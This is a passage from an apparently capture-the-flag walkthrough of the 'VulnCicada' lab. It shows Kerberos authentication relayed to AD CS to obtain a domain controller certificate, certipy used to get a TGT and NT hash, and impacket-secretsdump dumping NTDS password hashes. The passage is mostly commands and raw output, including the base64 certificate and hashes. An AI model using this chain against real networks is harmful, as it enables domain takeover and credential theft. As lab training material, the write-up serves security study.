267f071543219e8d5d299974ec54dae12d09aa21301bd66ac52148a03d49bc0788cc7820966e76e5cdead531957298d6af1830a4e0e1aaa3bc801be9375b3dc2a8c64d2beb3f7f34357f5ec7629e7bd51a1ec02660d74cfe42bbc1e1e2f34858f9f3bd0211b698cd7149ad4e4bf8e7a3275f2a88e24d1980225d8e44c93d5f5ea21726665dd6686aa1fbc572e498774a20382ebc453e9641fccf273f5ce1f102046dc585d4ca219f1bf9dbcbc53a73a84fc0a0d2187f3f23814e65cef07597d95420dcde95c96c8d97c91ac33e8bcdd4063e886a55cc0ed29dfa9d276c0da01dadeb5d2b08a3063f65493344e829398e1b20787b529a33d8b6c49cb27d3e74961d86518d91b4f1d61631a492e6a528ee41b5297c9bdbec9efa753d3d0177f7c0ff54110a6aebcba25fff2db4ba7a06fc42324e308705b06d4e931c1efbca2e9cc290726ee0712a38857f9ae4af9f1fb81319204e0293e5c98d23af8573544d596bbc51f8368f7da6c14f0d7c2655787ed15e237384e919a3f4c343c014ed7b4707e8b69071de782d240b3c3aef5354dba4a0701c58855edd609c69234070ac250e68af1d00debe6f2d28525f2a21619e65de9f0b52ad67eae2d7a82dab9a70e6ff71050fb4a54dcf89ce2bf45e525dfe02f6a1d6be056ac848d5aaae4e4e2e2c77d5ee9ded1eebe1b5b850c35df0d561226655f3e2bf9b9603a92425e8257c50fe08441a44e4a9ab31c9f88915110556923d199f21e921f02017bf5fd35c436013ae097584a5e29040da3914801120cf64a1c14f8757b6d5b53c2060131e01155ab6b9b615010ead6e19d1f67d0227885d15a6a3e82e9e8de9ef56cd1022cea71376f7cd7e3421c81b66539104f5af7652229d9f6c0eb5282cf2c1dd54594ba62f55425c82da598956f8bfb1379439d3334295031785a6d26c4e0ccb03b55b4a1bd7f491cdb5fad6f23e0da13674e6208122c21516cb1fcc693d21fb6278899673144bd74621e3de933ee586545d017e4da4f9a39dd6ecc3a3815447080717e7de92abdfa48201a9308201a5a003020112a282019c04820198f0b165e6a0844db865f452ab292612be96f00bea63f4a5a14c03190fb3f0b68eb70e9769b6d282f76dae6503539b79a0c2b4674ea73ce615e5235541c8de73c660eeb1d79857742d9c14a19f3525c56c052ab6c72708f34d6434daa02a85323bd5232a37027c01bd1d73eef8919da7eb9646796b1a7e7d43c03fcf628483b8069ee72a2fe0c743e69f790d328ac2336213f22bd36e7aacd03d58169f7394e543c45b89c1413af524a63a0cdeb7abaabe323521677811a9f8245bc24e597a39b84b034472d00195c77fa5a33bb1521e5b744b2283503d7ee6dad68c213300db58155b6f03ea9ebbcf9798d139c093139efb8e2751b64b539fd9a20f758b4cd4dfd3167e35c35ecaa8450fcbf36111ff98fc998af6f2934592485a960a9b601ff2f34466396efcbfeacdc1bb8203b9b4eeede65402bfa9f8701515834a0a1ea7784003fdb9fa4eacf1a6997cbe60f8f8d314fd19016d59a35bde012cf1fcb8c980f6f85a4b887a831cd45d76ca1ed8683c73d44d7d2febc72f18a6869fc61d526147ba10bb2ee1f57ae01df9829b9be6ef0225c6725fc25c2b
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404424f5ad68bf96bd0dccb216d9f88d4e9138a94aced2822098d48f44acb41b5dab5b7d7546e8c218593f3b9b59f743f4eb0f5406fc7d487f8441d35374de65093fa15a8
[+] HTTP session established
[+] Cookie ASPSESSIONIDAQTTQACB=GNKPMNIAKIEBCEMEMMDCKJCI; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 90)
[+] Certificate in PKCS12: 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
然后切换到kali并连上vpn
把base64格式的PKCS12转为.p12(.pfx)证书
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# file cert.p12
cert.p12: data
然后请求tgt
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-secretsdump -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
cicada.vl\Shirley.West:1104:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Jordan.Francis:1105:aad3b435b51404eeaad3b435b51404ee:f5caf661b715c4e1435dfae92c2a65e3:::
cicada.vl\Jane.Carter:1106:aad3b435b51404eeaad3b435b51404ee:7e133f348892d577014787cbc0206aba:::
^C[-]
Delete resume session file? [y/N] n
[*] Cleaning up...
reference: